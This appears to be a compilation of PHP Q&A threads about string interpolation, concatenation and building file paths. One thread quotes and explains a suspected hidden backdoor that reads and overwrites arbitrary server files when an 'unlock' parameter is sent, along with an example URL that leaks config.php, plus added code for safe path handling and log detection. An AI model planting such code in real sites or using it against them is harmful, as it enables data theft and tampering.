I've been working on a PHP dynamic drop-down list that scans a folder on the web server and lists its contents. It works; here's the relevant selection of the code.
<?php
foreach(glob(dirname(rootdir) . '/path/username/*') as $filename){
$filename = basename($filename);
echo "<option value='filepath/username/" . $filename . "'>".$filename."</option>";
}
?>
However, if I use a variable to populate part of the file path, the variable doesn't get added to the path.
<?php
$name = "jsmith";
foreach(glob(dirname(rootdir) . '/path/$name/*') as $filename){
$filename = basename($filename);
echo "<option value='filepath/$name/" . $filename . "'>".$filename."</option>";
}
?>
$name = "jsmith"
The result I'm looking for is /path/$name/* = /path/jsmith/
and
filepath/$name/ = filepath/jsmith/
How do I get the glob(dirname) and option value=' to recognize the variables?
You need to either concatenate the variable with the string or wrap the string in double quotes so the variable is parsed.
Double Quotes
<?php
$name = "jsmith";
foreach(glob(dirname(rootdir) . "/path/$name/*") as $filename){
$filename = basename($filename);
echo "<option value='filepath/$name/" . $filename . "'>".$filename."</option>";
}
?>
Concatenate
<?php
$name = "jsmith";
foreach(glob(dirname(rootdir) . '/path/' . $name . '/*') as $filename){
$filename = basename($filename);
echo "<option value='filepath/$name/" . $filename . "'>".$filename."</option>";
}
?>
Single quotes do not interpolate. (i.e. Variables in the string will not be replaced with their values.) However, double-quotes do interpolate.
You'll need to change '/path/$name/*' to "/path/$name/*" or use string concatenation with '/path/' . $name . '/*' instead.
Also, you should be careful with accepting user-controlled input for $name as it may lead to a directory traversal attack.
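One way to handle a user-supplied $name safely, as an added example that is not part of the original answers. The function names, the base directory and the constructed temp tree are assumptions for illustration: the name is checked against an allowlist, the resolved path is confirmed to stay under the base directory, and every value is HTML-escaped on output.

```php
<?php
// Added example. $baseDir and the "filepath/" URL prefix are assumptions.
function listUserFiles(string $baseDir, string $name): array
{
    // Allowlist a plain directory name: rejects "..", "/", NUL bytes and
    // glob metacharacters such as "*" or "{".
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return [];
    }
    $base = realpath($baseDir);
    $dir  = realpath($baseDir . '/' . $name);   // also resolves symlinks
    if ($base === false || $dir === false || !is_dir($dir)) {
        return [];
    }
    // Containment: the resolved directory must still sit under the base.
    if (strncmp($dir, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return [];
    }
    $files = [];
    foreach (glob($dir . '/*') ?: [] as $path) {
        if (is_file($path)) {
            $files[] = basename($path);
        }
    }
    return $files;
}

function renderOptions(string $name, array $files): string
{
    $html = '';
    foreach ($files as $file) {
        // File names come from disk and may contain quotes or "<"; escape them.
        $value = htmlspecialchars("filepath/$name/$file", ENT_QUOTES, 'UTF-8');
        $label = htmlspecialchars($file, ENT_QUOTES, 'UTF-8');
        $html .= "<option value='$value'>$label</option>\n";
    }
    return $html;
}

// Constructed demo tree in the temp directory.
$base = sys_get_temp_dir() . '/demo_' . bin2hex(random_bytes(4));
mkdir("$base/jsmith", 0700, true);
touch("$base/jsmith/report.txt");
echo renderOptions('jsmith', listUserFiles($base, 'jsmith'));
var_dump(listUserFiles($base, '../../etc'));   // rejected by the allowlist
var_dump(listUserFiles($base, 'js*'));         // glob metacharacter rejected
```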
I have this code, which will create result.png on my server:
imagepng($image, "./result/result.png");
Now I have $text , $type , $id
How can I create file with result_$text _ $id _ $type?
Example: ./result/result_123_131_1.png ;
./result/result_Text_1364_3.png
It's very simple:
// Braces are required here: "$text_" would be read as a variable named $text_.
$name = "./result/result_{$text}_{$id}_{$type}";
//do whatever you do to save the image and use $name as name of the file.
In php the double quotes are used whenever you have variables you want to use in some string literal. What I do above is I insert the value of the variables into the string literal "./result/result___".
More info here.
// imagepng() returns a bool, so build the file name first and pass it in.
$file = "./result/result_" . $text . "_" . $id . "_" . $type . ".png";
imagepng($image, $file);
I'm working on a website and recently picked someone up to work on the PHP portion, and I have had suspicions that he may have added malicious code to the site. He pushed a bit of PHP without permission and without mentioning anything to anyone.
The push was labelled 'Added Security'.
Here's the code:
<?PHP
if(isset($_GET['unlock'])) {
$id = $_GET['id'];
$dic = $_SERVER['PHP_SELF'];
$name = basename($dic) . "?unlock";
$url = './$name?unlock&id='.$id;
$file = "./$id";
if(isset($_GET['f'])) {
$f = $_GET['f'];
$file = "./$f/$id";
}
if (isset($_POST['text'])) {
file_put_contents($file, $_POST['text']);
if(isset($_GET['f'])) {
$f = $_GET['f'];
header('location: ' . $name . '&id=' . $id . '&f=' . $f);
} else {
header('location: ' . $name . '&id=' . $id);
}
}
$text = htmlentities(file_get_contents($file));
echo "<form method='post'><input type='submit'><textarea name='text'>$text</textarea></form>$dic";
die();
}
?>
Thanks in advance.
Let's see, the following
<?php
if(isset($_GET['unlock'])) {
...
}
Means that if you don't send the parameter unlock then nothing would be displayed. It is like a naive attempt at keeping a secret piece of code that only he can unlock with a magic word.
Regarding what's inside
$id = $_GET['id'];
$dic = $_SERVER['PHP_SELF'];
$name = basename($dic) . "?unlock";
//$url = './$name?unlock&id='.$id; // the former would fail to interpolate $name
$url = "./$name&id=".$id;
$file = "./$id";
if(isset($_GET['f'])) {
$f = $_GET['f'];
$file = "./$f/$id";
}
$text = htmlentities(file_get_contents($file));
echo"<form method='post'><input type='submit'><textarea name='text'>$text</textarea> </form>";
If you pass the parameter unlock and id (which is a filename), plus optionally a parameter f (which is a folder) you can see the contents of that file in the textarea. For example
http://www.myserver.com/thescript.php?unlock&id=config.php&f=app
would expose whatever sensitive information you have in your config.php inside the app folder.
Finally, this part
if (isset($_POST['text'])) {
file_put_contents($file, $_POST['text']);
if(isset($_GET['f'])) {
$f = $_GET['f'];
header('location: ' . $name . '&id=' . $id . '&f=' . $f);
} else {
header('location: ' . $name . '&id=' . $id);
}
}
Would let you edit or create a file by submitting the form. It might fail due to lack of permissions, but since you can play with the folder, you just insist until you find a writable folder.
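To check whether the snippet was ever used, the web server's access log can be searched for requests that carry the unlock parameter. The following is an added example, not part of the original answer. The log lines are constructed, the common log format is an assumption, and thescript.php is the name from the answer's example URL.

```php
<?php
// Added example: constructed access-log lines in common log format.
$sampleLog = <<<'LOG'
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:02:13 +0000] "GET /thescript.php?unlock&id=config.php&f=app HTTP/1.1" 200 834
203.0.113.9 - - [01/Jan/2024:10:02:40 +0000] "POST /thescript.php?unlock&id=config.php&f=app HTTP/1.1" 302 0
198.51.100.4 - - [01/Jan/2024:10:05:00 +0000] "GET /search.php?q=unlock+phone HTTP/1.1" 200 2210
LOG;

function findUnlockRequests(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', $log, -1, PREG_SPLIT_NO_EMPTY) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;
        }
        parse_str((string) parse_url($m[4], PHP_URL_QUERY), $query);
        // The snippet only runs when "unlock" is a parameter *name*, and it
        // needs "id" to pick a file; "unlock" inside a value does not count.
        if (!array_key_exists('unlock', $query) || !is_string($query['id'] ?? null)) {
            continue;
        }
        $folder = is_string($query['f'] ?? null) ? $query['f'] . '/' : '';
        $hits[] = [
            'client' => $m[1],
            'time'   => $m[2],
            // GET displays the file; POST overwrites it with the form body.
            'action' => $m[3] === 'POST' ? 'write' : 'read',
            'target' => $folder . $query['id'],
            'status' => (int) $m[5],
        ];
    }
    return $hits;
}

foreach (findUnlockRequests($sampleLog) as $hit) {
    printf("%s %s %-5s %s (HTTP %d)\n", $hit['time'], $hit['client'],
        $hit['action'], $hit['target'], $hit['status']);
}
```

Access logs normally do not record POST bodies, so a "write" hit shows which file was targeted but not what was written to it; compare the file against version control or a backup.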
Hi I am trying to get images to load into a page using the file names from an array,
This is what I have so far
<?php
$i=0;
$img=array("1.png","2.png","3.png","4.png");
while ($i<count($img))
{
echo "<img class='loadin' alt='imgg' src=" . "'http://www/images/" . $img[i] . "'" . "/" . ">" . "<br/>";
$i++;
}
?>
It seems to ignore the file name and just enters:
http://www/images/
as the source and ignores the file name from the array
Any Help would be great Thanks
Mikey
You forgot the dollar sign with your $i variable: $img[$i]
EDIT:
(btw. using a foreach-loop would be easier...)
foreach($img AS $filename) {
echo "<img class='loadin' alt='imgg' src='http://www/images/" . $filename . "'/><br/>";
}
I've been trying to create a directory following a specific structure, yet nothing appears to be happening. I've approached this by defining multiple variables as follows:
$rid = '/appicons/';
$sid = '$artistid';
$ssid = '$appid';
$s = '/';
and the function I've been using runs thusly:
$directory = $appid;
if (!is_dir ($directory))
{
mkdir($directory);
}
That works. However, I want to have the following structure in created directories: /appicons/$artistid/$appid/
yet nothing really seems to work. I understand that if I were to add more variables to $directory then I'd have to use quotes around them and concatenate them (which gets confusing).
Does anyone have any solutions?
$directory = "/appicons/$artistid/$appid/";
if (!is_dir ($directory))
{
//file mode
$mode = 0777;
//the third parameter set to true allows the creation of
//nested directories specified in the pathname.
mkdir($directory, $mode, true);
}
This should do what you want:
$rid = '/appicons/';
$sid = $artistid;
$ssid = $appid;
$s = '/';
$directory = $rid . $artistid . '/' . $appid . $s;
if (!is_dir ($directory)) {
mkdir($directory);
}
The reason your current code doesn't work is due to the fact you're trying to use a variable inside a string literal. A string literal in PHP is a string enclosed in single quotes ('). Every character in this string is treated as just a character, so any variables will just be parsed as text. Unquoting the variables so your declarations look like the following fixes your issue:
$rid = '/appicons/';
$sid = $artistid;
$ssid = $appid;
$s = '/';
This next line concatenates (joins) your variables together into a path:
$directory = $rid . $artistid . '/' . $appid . $s;
Concatenation works like this
$directory = $rid.$artistid."/".$appid."/";
When you're assigning one variable to another, you don't need the quotes around it, so the following should be what you're looking for.
$rid = 'appicons';
$sid = $artistid;
$ssid = $appid;
and then...
$dir = '/' . $rid . '/' . $sid . '/' . $ssid . '/';
if (!is_dir($dir)) {
mkdir($dir);
}
I'm trying to get Google Street View tiles and save them. But file_get_contents doesn't like my URL:
Here's my code:
$img = "http://cbk0.google.com/cbk?output=tile&panoid="+$panorama_id+"&zoom=3&x="+$i+"&y='"+$x+"'";
$url = ""+$panorama_id+"Xval"+$i.+"Yval"+$x+".jpg";
file_put_contents($url, file_get_contents($img));
You're using + for concatenation. That's not PHP. You need the dot . operator instead:
$img = "http://cbk0.google.com/cbk?output=tile&panoid=" . $panorama_id . "&zoom=3&x=" . $i . "&y='" . $x . "'";
$url = $panorama_id . "Xval" . $i . "Yval" . $x . ".jpg";
See string operators in the PHP manual.
Alternatively, with double quoted strings, variables within the string will be parsed. See the manual page for the string type.
$img = "http://cbk0.google.com/cbk?output=tile&panoid=$panorama_id&zoom=3&x=$i&y='$x'";
$url = "{$panorama_id}Xval{$i}Yval{$x}.jpg";